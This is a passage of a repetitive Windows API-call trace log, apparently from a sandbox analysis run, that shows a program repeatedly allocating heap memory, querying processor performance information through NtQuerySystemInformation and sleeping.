hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.767] Sleep (dwMilliseconds=0x110) [0226.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.786] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.787] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.787] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.787] Sleep (dwMilliseconds=0x110) [0226.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.802] Sleep (dwMilliseconds=0x110) [0226.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.814] Sleep (dwMilliseconds=0x110) [0226.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.832] Sleep (dwMilliseconds=0x110) [0226.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.846] Sleep (dwMilliseconds=0x110) [0226.868] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.868] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.868] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.877] Sleep (dwMilliseconds=0x110) [0226.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.896] Sleep (dwMilliseconds=0x110) [0226.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.910] Sleep (dwMilliseconds=0x110) [0226.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.926] Sleep (dwMilliseconds=0x110) [0226.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.938] Sleep (dwMilliseconds=0x110) [0226.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.958] Sleep (dwMilliseconds=0x110) [0226.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.975] Sleep (dwMilliseconds=0x110) [0226.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.991] Sleep (dwMilliseconds=0x110) [0227.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.024] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) 